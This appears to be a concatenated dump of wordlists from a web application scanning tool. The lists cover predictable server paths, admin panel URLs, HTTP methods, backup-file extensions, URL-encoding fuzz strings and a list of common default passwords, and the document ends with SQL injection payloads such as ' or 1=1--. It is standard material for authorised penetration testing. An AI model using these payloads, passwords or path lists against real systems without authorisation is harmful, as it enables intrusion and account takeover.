/COnlineBank 10 | /CSample 11 | /ExceptionThrown.jsp 12 | /FormAuthServlet 13 | /fortune 14 | /gx 15 | /GXApp 16 | /GXApp/COnlineBank 17 | /GXApp/COnlineBank/COBLogin.html 18 | /GXApp/CSample 19 | /GXApp/CSample/index.html 20 | /GXApp/images 21 | /GXApp/index.html 22 | /GXApp/OnlineBank 23 | /GXApp/OnlineBank/OBLogin.html 24 | /gx.cgi 25 | /gx.exe 26 | /ias-samples 27 | /ias-samples/index.html 28 | /index.html 29 | /JSPRunner 30 | /JSPRunnerSticky 31 | /lotery 32 | /NASApp 33 | /NASApp/fortune/fortune 34 | /NASApp/system 35 | /NASApp/system/BasicAuthServlet 36 | /NASApp/system/CertAuthServlet 37 | /NASApp/system/ExceptionThrown.jsp 38 | /NASApp/system/FormAuthServlet 39 | /NASApp/system/JSPRunner 40 | /NASApp/system/JSPRunnerSticky 41 | /NASApp/system/SessionInvalidator 42 | /NASApp/system/StaticServlet 43 | /NASApp/system/ValidationError.jsp 44 | /NASApp/system/WelcomeListServlet 45 | /OnlineBank 46 | /servlet 47 | /SessionInvalidator 48 | /StaticServlet 49 | /system 50 | /ValidationError.jsp 51 | /WelcomeListServlet 52 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/SuniPlanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | cgi-bin 18 | config 19 | dirb_random.cgi 20 | dirb_random.jsp 21 | dirb_random.shtml 22 | docs 23 | dsgw 24 | help 25 | index.html 26 | jsp 27 | manual 28 | mc-icons 29 | netshare 30 | ns-icons 31 | publisher 32 | search 33 | search-ui 34 | servlet 35 | servlets 36 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Vignette.txt: -------------------------------------------------------------------------------- 1 | /0,,,00 2 | /0,,,00.html 3 | /1,,,00 4 | /1,,,00.html 5 | /CDA 6 | /CDS 7 | /CMA 8 | /CMS 9 | /Deleting 10 | /Docs 11 | /Editing 12 | /HOME 13 | /Images 14 | /Internal 15 | /MetaDataUpdate 16 | /Report 17 | /Select 18 | /StoryServer 19 | /TMT 20 | /VGN 21 | /XML 22 | /ac 23 | /allvars 24 | /asp 25 | /aspstatus 26 | /cda 27 | /cds 28 | /cma 29 | /cms 30 | /controller 31 | /diag 32 | /docs 33 | /edit 34 | /error 35 | /errorpage 36 | /errors 37 | /executequery 38 | /external 39 | /home 40 | /ibm 41 | /initialize 42 | /internal 43 | /jsp 44 | /jspstatus 45 | /jsptest 46 | /legacy 47 | /license 48 | /listcolumns 49 | /login 50 | /loginlogo 51 | /logo 52 | /main 53 | /menu 54 | /metadataupdate 55 | /performance 56 | /portal 57 | /ppstats 58 | /preview 59 | /previewer 60 | /record 61 | /reset 62 | /save 63 | /stat 64 | /status 65 | /storyserver 66 | /style 67 | /stylepreviewer 68 | /utils 69 | /vdc 70 | /vgn 71 | /vr 72 | /Ping.jsp 73 | /HelloWorld.jsp 74 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/wellknown-rfc5785.txt: -------------------------------------------------------------------------------- 1 | .well-known/ 2 | .well-known/acme-challenge 3 | .well-known/apple-app-site-association 4 | .well-known/apple-developer-merchant-domain-association 5 | .well-known/ashrae 6 | .well-known/assetlinks.json 7 | .well-known/browserid 8 | .well-known/caldav 9 | .well-known/carddav 10 | .well-known/core 11 | .well-known/csvm 12 | .well-known/dnt 13 | .well-known/dnt-policy.txt 14 | .well-known/est 15 | .well-known/genid 16 | .well-known/hoba 17 | .well-known/host-meta 18 | .well-known/host-meta.json 19 | .well-known/keybase.txt 20 | .well-known/ni 21 | .well-known/openid-configuration 22 | .well-known/openorg 23 | .well-known/posh 24 | .well-known/reload-config 25 | .well-known/repute-template 26 | .well-known/stun-key 27 | .well-known/time 28 | .well-known/timezone 29 | .well-known/void 30 | .well-known/webfinger 31 | -------------------------------------------------------------------------------- /wordlist/general/admin-panels.txt: -------------------------------------------------------------------------------- 1 | admin.php 2 | admin/ 3 | administrator/ 4 | moderator/ 5 | webadmin/ 6 | adminarea/ 7 | bb-admin/ 8 | adminLogin/ 9 | admin_area/ 10 | panel-administracion/ 11 | instadmin/ 12 | memberadmin/ 13 | administratorlogin/ 14 | adm/ 15 | admin/account.php 16 | admin/index.php 17 | admin/login.php 18 | admin/admin.php 19 | admin/account.php 20 | joomla/administrator 21 | login.php 22 | admin_area/admin.php 23 | admin_area/login.php 24 | siteadmin/login.php 25 | siteadmin/index.php 26 | siteadmin/login.html 27 | admin/account.html 28 | admin/index.html 29 | admin/login.html 30 | admin/admin.html 31 | admin_area/index.php 32 | bb-admin/index.php 33 | bb-admin/login.php 34 | bb-admin/admin.php 35 | admin/home.php 36 | admin_area/login.html 37 | admin_area/index.html 38 | admin/controlpanel.php 39 | admincp/index.asp 40 | admincp/login.asp 41 | admincp/index.html 42 | admin/account.html 43 | adminpanel.html 44 | webadmin.html 45 | webadmin/index.html 46 | webadmin/admin.html 47 | webadmin/login.html 48 | admin/admin_login.html 49 | admin_login.html 50 | panel-administracion/login.html 51 | admin/cp.php 52 | cp.php 53 | administrator/index.php 54 | administrator/login.php 55 | nsw/admin/login.php 56 | webadmin/login.php 57 | admin/admin_login.php 58 | admin_login.php 59 | administrator/account.php 60 | administrator.php 61 | admin_area/admin.html 62 | pages/admin/admin-login.php 63 | admin/admin-login.php 64 | admin-login.php 65 | bb-admin/index.html 66 | bb-admin/login.html 67 | bb-admin/admin.html 68 | admin/home.html 69 | modelsearch/login.php 70 | moderator.php 71 | moderator/login.php 72 | moderator/admin.php 73 | account.php 74 | pages/admin/admin-login.html 75 | admin/admin-login.html 76 | admin-login.html 77 | controlpanel.php 78 | admincontrol.php 79 | admin/adminLogin.html 80 | adminLogin.html 81 | admin/adminLogin.html 82 | home.html 83 | rcjakar/admin/login.php 84 | adminarea/index.html 85 | adminarea/admin.html 86 | webadmin.php 87 | webadmin/index.php 88 | webadmin/admin.php 89 | admin/controlpanel.html 90 | admin.html 91 | admin/cp.html 92 | cp.html 93 | adminpanel.php 94 | moderator.html 95 | administrator/index.html 96 | administrator/login.html 97 | user.html 98 | administrator/account.html 99 | administrator.html 100 | login.html 101 | modelsearch/login.html 102 | moderator/login.html 103 | adminarea/login.html 104 | panel-administracion/index.html 105 | panel-administracion/admin.html 106 | modelsearch/index.html 107 | modelsearch/admin.html 108 | admincontrol/login.html 109 | adm/index.html 110 | adm.html 111 | moderator/admin.html 112 | user.php 113 | account.html 114 | controlpanel.html 115 | admincontrol.html 116 | panel-administracion/login.php 117 | wp-login.php 118 | adminLogin.php 119 | admin/adminLogin.php 120 | home.php 121 | adminarea/index.php 122 | adminarea/admin.php 123 | adminarea/login.php 124 | panel-administracion/index.php 125 | panel-administracion/admin.php 126 | modelsearch/index.php 127 | modelsearch/admin.php 128 | admincontrol/login.php 129 | adm/admloginuser.php 130 | admloginuser.php 131 | admin2.php 132 | admin2/login.php 133 | admin2/index.php 134 | adm/index.php 135 | adm.php 136 | affiliate.php 137 | adm_auth.php -------------------------------------------------------------------------------- /wordlist/general/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/general/big.txt -------------------------------------------------------------------------------- /wordlist/general/catala.txt: -------------------------------------------------------------------------------- 1 | acces 2 | activitats 3 | administracio 4 | afegir 5 | agafar 6 | agenda 7 | ajuda 8 | ajudes 9 | antic 10 | arrel 11 | article 12 | articles 13 | arxiu 14 | arxius 15 | borsa 16 | botiga 17 | bulleti 18 | bustia 19 | calaix 20 | campanyes 21 | capsalera 22 | carpeta 23 | cat 24 | catala 25 | cataleg 26 | catalegs 27 | categories 28 | celler 29 | cerca 30 | cercador 31 | claus 32 | client 33 | clients 34 | colleccio 35 | comunicacio 36 | confirmacio 37 | contingut 38 | continguts 39 | copia 40 | correu 41 | crida 42 | dades 43 | demamar 44 | demanas 45 | descarrega 46 | descarregues 47 | desenvolupament 48 | directori 49 | disseny 50 | document 51 | documentacio 52 | documents 53 | eines 54 | empreses 55 | enllacos 56 | entitats 57 | entorns 58 | esborrar 59 | escola 60 | externes 61 | finestra 62 | fitxer 63 | fitxers 64 | fonts 65 | formulari 66 | formularis 67 | forum 68 | forums 69 | gestio 70 | glossari 71 | historic 72 | imatge 73 | imatges 74 | informacio 75 | inici 76 | jocs 77 | lletres 78 | lleure 79 | llibres 80 | llista 81 | localitzador 82 | locals 83 | maquinari 84 | mitjans 85 | mostra 86 | mostres 87 | mot 88 | noticies 89 | nou 90 | novetats 91 | nul 92 | obrir 93 | operacio 94 | organitzacions 95 | pagines 96 | pas 97 | personals 98 | pestanya 99 | pestanyes 100 | peu 101 | porta 102 | primer 103 | principal 104 | privat 105 | programari 106 | projecte 107 | projectes 108 | prova 109 | proves 110 | public 111 | publicacions 112 | pujar 113 | recerca 114 | recull 115 | reculls 116 | registre 117 | registres 118 | salo 119 | seccio 120 | segon 121 | seguretat 122 | serveis 123 | sistemes 124 | sumari 125 | sumaris 126 | tasques 127 | taula 128 | tauler 129 | tecnic 130 | temes 131 | tercer 132 | titulars 133 | tot 134 | totes 135 | tots 136 | transit 137 | transmissio 138 | treballador 139 | treballadors 140 | usuari 141 | usuaris 142 | vell 143 | veure 144 | -------------------------------------------------------------------------------- /wordlist/general/euskera.txt: -------------------------------------------------------------------------------- 1 | administrazio 2 | administrazioa 3 | argitalpenak 4 | artxiboa 5 | ataria 6 | aupa 7 | aurrera 8 | bai 9 | berri 10 | bidali 11 | bilatu 12 | buzoia 13 | dataz 14 | dokumentuak 15 | egutegia 16 | erreala 17 | ez 18 | fitxategia 19 | foru 20 | gestio 21 | gidak 22 | gora 23 | hasi 24 | hizkuntza 25 | ikusi 26 | informazio 27 | loturak 28 | makusi 29 | mezuak 30 | oharra 31 | proiektua 32 | saioa 33 | sustapena 34 | taula 35 | txostena 36 | -------------------------------------------------------------------------------- /wordlist/general/extensions_common.txt: -------------------------------------------------------------------------------- 1 | .asp 2 | .aspx 3 | .bat 4 | .c 5 | .cfm 6 | .cgi 7 | .com 8 | .dll 9 | .exe 10 | .htm 11 | .html 12 | .inc 13 | .jhtml 14 | .jsa 15 | .jsp 16 | .log 17 | .mdb 18 | .nsf 19 | .php 20 | .phtml 21 | .pl 22 | .reg 23 | .sh 24 | .shtml 25 | .sql 26 | .txt 27 | .xml 28 | / 29 | -------------------------------------------------------------------------------- /wordlist/general/http_methods.txt: -------------------------------------------------------------------------------- 1 | GET 2 | NOEXISTE 3 | POST 4 | HEAD 5 | PUT 6 | TRACE 7 | TRACK 8 | SEARCH 9 | INDEX 10 | OPTIONS 11 | DELETE 12 | CONNECT 13 | PATCH 14 | PROPFIND 15 | PROPPATCH 16 | MKCOL 17 | COPY 18 | MOVE 19 | LOCK 20 | UNLOCK 21 | CHECKOUT 22 | SHOWMETHOD 23 | LINK 24 | UNLINK 25 | CHECKIN 26 | TEXTSEARCH 27 | SPACEJUMP 28 | ORDERPATCH 29 | ACL 30 | VERSION-CONTROL 31 | REPORT 32 | UNCHECKOUT 33 | -------------------------------------------------------------------------------- /wordlist/general/medium.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/general/medium.txt -------------------------------------------------------------------------------- /wordlist/general/mutations_common.txt: -------------------------------------------------------------------------------- 1 | .001 2 | .002 3 | .1 4 | .2 5 | .7z 6 | .Z 7 | .back 8 | .backup 9 | .bak 10 | .bakup 11 | .bas 12 | .bz2 13 | .c 14 | .conf 15 | .copia 16 | .core 17 | .cpp 18 | .dat 19 | .db 20 | .default 21 | .dll 22 | .doc 23 | .ini 24 | .jar 25 | .java 26 | .old 27 | .orig 28 | .pas 29 | .rar 30 | .sav 31 | .saved 32 | .source 33 | .src 34 | .stackdump 35 | .tar 36 | .tar.gz 37 | .temp 38 | .test 39 | .tgz 40 | .tmp 41 | .txt 42 | .war 43 | .zip 44 | ~ 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /wordlist/general/test.txt: -------------------------------------------------------------------------------- 1 | master 2 | environment 3 | classes 4 | css 5 | images 6 | includes 7 | scripts 8 | images 9 | docs 10 | test 11 | prueba 12 | -------------------------------------------------------------------------------- /wordlist/others/common_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | 123456 3 | 1234567 4 | 12345678 5 | 123asdf 6 | Admin 7 | admin 8 | administrator 9 | asdf123 10 | backup 11 | backupexec 12 | changeme 13 | clustadm 14 | cluster 15 | compaq 16 | default 17 | dell 18 | dmz 19 | domino 20 | exchadm 21 | exchange 22 | ftp 23 | gateway 24 | guest 25 | lotus 26 | money 27 | notes 28 | office 29 | oracle 30 | pass 31 | password 32 | password! 33 | password1 34 | print 35 | qwerty 36 | replicate 37 | seagate 38 | secret 39 | sql 40 | sqlexec 41 | temp 42 | temp! 43 | temp123 44 | test 45 | test! 46 | test123 47 | tivoli 48 | veritas 49 | virus 50 | web 51 | www 52 | KKKKKKK -------------------------------------------------------------------------------- /wordlist/regex/amazon.txt: -------------------------------------------------------------------------------- 1 | (? 31 | ? 32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /wordlist/stress/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /wordlist/stress/doble_uri_hex.txt: -------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 | %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | %25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | -------------------------------------------------------------------------------- /wordlist/stress/uri_hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | %bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /wordlist/vulns/apache.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | .htpasswd 3 | .meta 4 | .web 5 | access_log 6 | cgi 7 | cgi-bin 8 | cgi-pub 9 | cgi-script 10 | dummy 11 | error 12 | error_log 13 | htdocs 14 | httpd 15 | httpd.pid 16 | icons 17 | index.html 18 | logs 19 | manual 20 | phf 21 | printenv 22 | server-info 23 | server-status 24 | status 25 | test-cgi 26 | tmp 27 | ~bin 28 | ~ftp 29 | ~nobody 30 | ~root 31 | -------------------------------------------------------------------------------- /wordlist/vulns/coldfusion.txt: -------------------------------------------------------------------------------- 1 | CFIDE 2 | CFIDE/administrator 3 | CFIDE/administrator/aboutcf.cfm 4 | CFIDE/administrator/Application.cfm 5 | CFIDE/administrator/checkfile.cfm 6 | CFIDE/administrator/enter.cfm 7 | CFIDE/administrator/header.cfm 8 | CFIDE/administrator/homefile.cfm 9 | CFIDE/administrator/homepage.cfm 10 | CFIDE/administrator/index.cfm 11 | CFIDE/administrator/left.cfm 12 | CFIDE/administrator/linkdirect.cfm 13 | CFIDE/administrator/login.cfm 14 | CFIDE/administrator/logout.cfm 15 | CFIDE/administrator/navserver.cfm 16 | CFIDE/administrator/right.cfm 17 | CFIDE/administrator/tabs.cfm 18 | CFIDE/administrator/welcome.cfm 19 | CFIDE/administrator/welcomedoc.cfm 20 | CFIDE/administrator/welcomeexapps.cfm 21 | CFIDE/administrator/welcomefooter.cfm 22 | CFIDE/administrator/welcomegetstart.cfm -------------------------------------------------------------------------------- /wordlist/vulns/fatwire.txt: -------------------------------------------------------------------------------- 1 | servlet/HelloCS 2 | servlet/ContentServer 3 | servlet/Satellite 4 | servlet/CatalogManager 5 | servlet/BlobServer 6 | servlet/TreeManager 7 | servlet/CookieServer 8 | servlet/CacheServer 9 | servlet/EvalServer 10 | servlet/DebugServer 11 | servlet/FlushServer 12 | servlet/SeedDispatchServer 13 | servlet/Inventory 14 | servlet/SyncSeedDispatchServer 15 | servlet/PageDispatchServer 16 | servlet/DispatchManager 17 | servlet 18 | HelloCS 19 | ContentServer 20 | Satellite 21 | CatalogManager 22 | BlobServer 23 | TreeManager 24 | CookieServer 25 | CacheServer 26 | EvalServer 27 | DebugServer 28 | FlushServer 29 | SeedDispatchServer 30 | Inventory 31 | SyncSeedDispatchServer 32 | PageDispatchServer 33 | DispatchManager 34 | Xcelerate/Admin/LoginPage.html 35 | Xcelerate 36 | Admin 37 | LoginPage 38 | LoginPage.html 39 | Xcelerate/LoginPage.html 40 | futuretense_cs/adminforms.html 41 | futuretense_cs 42 | adminforms 43 | adminforms.html 44 | futuretense 45 | openmarket 46 | fatwire 47 | divine 48 | contentserver 49 | xcelerate 50 | assetmaker 51 | -------------------------------------------------------------------------------- /wordlist/vulns/frontpage.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | QUERYHIT.HTM 3 | Search 4 | _fpclass 5 | _private 6 | _vti_adm 7 | _vti_aut 8 | _vti_bin 9 | _vti_cnf 10 | _vti_inf.html 11 | _vti_log 12 | _vti_pvt 13 | _vti_script 14 | _vti_txt 15 | admin.dll 16 | admin.exe 17 | administrators.pwd 18 | author.dll 19 | author.exe 20 | author.log 21 | authors.pwd 22 | cgi-bin 23 | default.htm 24 | frontpg.ini 25 | iisadmin 26 | isadmin 27 | logo.gif 28 | owssvr.dll 29 | queryhit.htm 30 | samples 31 | search 32 | service.grp 33 | service.pwd 34 | shtml.exe 35 | srchadm 36 | users.pwd 37 | vti_inf.html 38 | -------------------------------------------------------------------------------- /wordlist/vulns/iis.txt: -------------------------------------------------------------------------------- 1 | Micros~1 2 | WebSer~1 3 | _mem_bin 4 | _private 5 | _vti_adm 6 | _vti_aut 7 | _vti_bin 8 | _vti_cnf 9 | _vti_log 10 | _vti_pvt 11 | _vti_script 12 | _vti_txt 13 | administration 14 | adsamples 15 | archiv~1 16 | asp 17 | aspnet_client 18 | asps 19 | bin 20 | bins 21 | cgi-bin 22 | cmsample 23 | common 24 | common~1 25 | db 26 | fpsample 27 | help 28 | iisadmin 29 | iisadmpwd 30 | iishelp 31 | iissamples 32 | images 33 | inetpub 34 | inetsrv 35 | isapi 36 | msadc 37 | pbserver 38 | printers 39 | progra~1 40 | samples 41 | scripts 42 | scripts 43 | scripts/samples 44 | scripts/tools 45 | sites 46 | siteserver 47 | system 48 | system_web 49 | web 50 | webpub 51 | winnt 52 | wwwroot 53 | x.cfm 54 | x.htx 55 | x.ida 56 | x.idc 57 | x.idq 58 | x.pl 59 | x.shtml 60 | -------------------------------------------------------------------------------- /wordlist/vulns/iplanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | ca 18 | cgi-bin 19 | config 20 | dirb_random.cgi 21 | dirb_random.jsp 22 | dirb_random.shtml 23 | docs 24 | dsgw 25 | help 26 | index.html 27 | jsp 28 | manual 29 | mc-icons 30 | netshare 31 | ns-icons 32 | publisher 33 | search 34 | search-ui 35 | servlet 36 | servlets 37 | -------------------------------------------------------------------------------- /wordlist/vulns/jrun.txt: -------------------------------------------------------------------------------- 1 | SmarTicketApp/index.html 2 | WEB-INF/webapp.properties 3 | WEB-INF/web.xml 4 | compass/logon.jsp 5 | databasenotes.html 6 | flash/java/javabean/FlashJavaBean.html 7 | jrunscripts 8 | jstl-war/index.html 9 | techniques/servlets/index.html 10 | travelnet/home.jsp 11 | worldmusic/action/cdlist 12 | worldmusic/action/catalog 13 | ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlist/vulns/netware.txt: -------------------------------------------------------------------------------- 1 | ICHAINErrors 2 | ICSLogin 3 | ICHAINLogout 4 | ICSIBroker 5 | NetStorage 6 | iManager 7 | eMFrame 8 | oneNet 9 | ICHAIN 10 | ICS 11 | NSearch 12 | SearchServlet 13 | site 14 | home.html 15 | iFolder 16 | update 17 | webacc 18 | nps 19 | -------------------------------------------------------------------------------- /wordlist/vulns/oracle9i.txt: -------------------------------------------------------------------------------- 1 | CookieExample 2 | Counter 3 | DateServlet 4 | HelloWorldServlet 5 | RequestParamExample 6 | SessionExample 7 | SessionServlet 8 | SimpleServlet 9 | SnoopServlet 10 | basic 11 | cal 12 | cgi-bin 13 | echo 14 | examples 15 | fcgi-bin 16 | hellouser 17 | hellouser.jsp 18 | j2ee 19 | jsp 20 | login.html 21 | ojspdemos 22 | perl 23 | printenv 24 | servlet 25 | simple 26 | snoop.jsp 27 | snp 28 | usebean.jsp 29 | welcomeuser.jsp 30 | -------------------------------------------------------------------------------- /wordlist/vulns/sql_inj.txt: -------------------------------------------------------------------------------- 1 | ' 2 | --ora_sqls 3 | #mysql 4 | '#mysql 5 | and 1=1 6 | and USER=USER 7 | and user()=user() 8 | and 2=0 9 | or 2=2 10 | ' and '2'='2 11 | ' and '2'='0 12 | ' or '2'='2 13 | /*ora_mysql*/and/**/2=2 14 | /*ora_mysql*/and/**/2=0 15 | '/*ora_mysql*/and/**/'2'='2 16 | '/*ora_mysql*/and/**/'2'='0 17 | '/*ora_mysql*/or/**/'2'='2 18 | and 2=2#mysql 19 | and 2=0#mysql 20 | and 2=2-- oracle_mysql 21 | and 2=0-- oracle_mysql 22 | ' and '2'='2'#mysql 23 | ' and '2'='0'#mysql 24 | ' and '2'='2'-- oracle 25 | ' and '2'='0'-- oracle 26 | 999999999999999999 27 | 1e100 28 | 2 or 2=2 29 | 2' or '2'='2 30 | order by 1-- 31 | admin'-- 32 | admin' 33 | 'test 34 | 'test-- 35 | ' or 1=1-- 36 | or 1=1-- 37 | or 1=1 38 | or 1=1# 